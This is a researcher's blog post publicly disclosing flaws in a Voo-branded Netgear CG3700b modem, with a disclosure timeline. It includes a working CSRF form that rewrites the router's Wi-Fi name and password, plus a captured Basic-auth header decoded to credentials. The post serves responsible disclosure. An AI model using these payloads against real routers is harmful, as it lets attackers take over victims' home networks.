Just before I left for America, I found a few Netgear CG3700b vulnerabilities in my Voo branded modem.
Voo branded Netgear CG3700b Vulnerabilities – Introduction
As the 90 days have passed since disclosing it to the vendor (see timeline below), it was time for me to publicly disclose my findings and payloads.
CVEs are still pending, but I will add them to this post when I receive them.
Cross-Site Request Forgery (CSRF) on all form POSTs
The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03) allows a (context-dependent) attacker to perform a Cross-Site Request Forgery (CSRF) attack on all configuration setting (/goform/
Example CSRF form:
<form method="POST" name="form0" action="http://192.168.0.1/goform/index" <input type="hidden" name="group_parametrage_wifi" value="active"> <input type="hidden" name="reseau_wifi_name" value="NEWSSID"> <input type="hidden" name="nom_select" value="AUTO-PSK"> <input type="hidden" name="canal" value=0> <input type="hidden" name="mot_de_passe" value="NEWWPAKEY"> <input type="hidden" name="NBandwidth" value=20> <input type="hidden" name="group_parametrage_wifi_an" value="active"> <input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G"> <input type="hidden" name="nom_select_an" value="AUTO-PSK"> <input type="hidden" name="canal_an" value=0> <input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G"> <input type="hidden" name="NBandwidth_an" value=20> <input type="hidden" name="group_fon" value="desactiver"> <input type="hidden" name="buttonApply" value=1> <input type="hidden" name="only_mode" value=0> <input type="hidden" name="selected_ch_an" value=1> </form>
Insufficient Authentication (OWASP-A2)
This same modem handles authentication via basic authentication over the default (HTTP, non-ssl) connection. This allows an attacker to easily decode the base64 encoded username and password, and authenticate to the router. This only requires an attacker be on the same network as the router, and sniff the clear-text traffic.
POST http://192.168.0.1/goform/parametre_config HTTP/1.1 Host: 192.168.0.1 Connection: keep-alive Content-Length: 24721 Cache-Control: max-age=0 Authorization: Basic dm9vOlBBU1NXT1JE
[email protected]:~# cat voo.txt dm9vOlBBU1NXT1JE [email protected]:~# base64 --decode voo.txt voo:PASSWORD
Insufficient Authentication (OWASP-A2)
The Voo Netgear CG3700b also uses the same key for authentication to the administrative console as well as to the wireless by default.
If a WPA2 flaw were to be found that made cracking it simple, the HTTP basic authentication was brute forced (known charset of A-Z and 8 characters), or some other vulnerability found, then this would cause both systems to fail instead of just one.
- 2016-01-22 – Discovered vulnerability, initially notified vendor.
- 2016-01-23 – Requested CVE.
- 2016-03-07 – Contacted vendor again, they notified me that they will not fix these issues at this time.
- 2016-04-20 – Attempted to contact Mitre again to receive CVE.
- 2016-04-21 – Sent to Full Disclosure.
- 2016-04-23 – Additional information and full disclosure published here.
- 2016-04-26 – Resent to Full Disclosure due to some errors.
- 2019-06-20 – Requested CVEs again with the new form.
Voo branded Netgear CG3700b Vulnerabilities – Conclusion
All in all, a fun weekend, and a few good findings.
The vendor has not gotten back to me regarding a patch for these issues, but I know that some of their other offerings are allegedly less vulnerable.
I will add any additional information to this post as necessary, but you can find the FullDisclosure report here.
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.
This page contains links to products that I may receive compensation from at no additional cost to you. View my Affiliate Disclosure page here. As an Amazon Associate, I earn from qualifying purchases.